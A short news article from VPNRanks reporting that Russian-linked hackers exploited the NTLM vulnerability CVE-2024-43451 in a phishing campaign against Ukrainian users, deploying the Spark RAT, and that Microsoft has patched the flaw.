Kyiv, November 14, 2024 –Russian hackers exploit NTLM flaw in Ukraine, targeting users through phishing emails and deploying malware to steal credentials. Microsoft issues urgent patch.
In a critical cyber assault, Russian hackers have exploited a recently uncovered NTLM vulnerability to target Ukrainian users in a widespread phishing campaign. This flaw, identified as CVE-2024-43451, leverages a security weakness in the NT LAN Manager (NTLM) protocol, allowing attackers to steal user credentials without needing direct access to passwords.
The cyberattack was discovered by Israeli cybersecurity firm ClearSky, which reported that the Russian-linked threat group UAC-0194 executed these attacks by embedding malicious URLs in emails sent from compromised Ukrainian government servers. Victims were lured into downloading a file disguised as an official document from the Ukrainian Ministry of Education.
It’s a sophisticated attack. Minimal user interaction is required—just a single click or even right-clicking a malicious URL can trigger the breach.
The attack chain directs victims to download a ZIP file containing a malicious internet shortcut (.URL) file, which initiates connections to a remote server, ultimately deploying the Spark RAT malware on their systems. The attackers gain control and can use the stolen NTLM hash to perform Pass-the-Hash attacks, allowing unauthorized access as legitimate users.
This exploit not only compromises user privacy but allows the attackers to manipulate credentials at a massive scale, intensifying the cybersecurity threat to Ukraine.
Microsoft has since patched the vulnerability, but the attack highlights the ongoing cybersecurity tensions between Russia and Ukraine.
Ukrainian cybersecurity agencies continue to investigate and advise caution when opening government-related documents. This breach underscores the escalating risk of state-sponsored cyberattacks targeting critical systems in war-torn regions.
Other News At VPNRanks
Hey, wait!
Stay informed on the latest privacy updates, cybersecurity insights, and internet freedom news by following VPNRanks news daily! As your primary resource for critical updates in online security, we ensure you’re always in the know. Make VPNRanks your go-to guide for safeguarding your digital life!
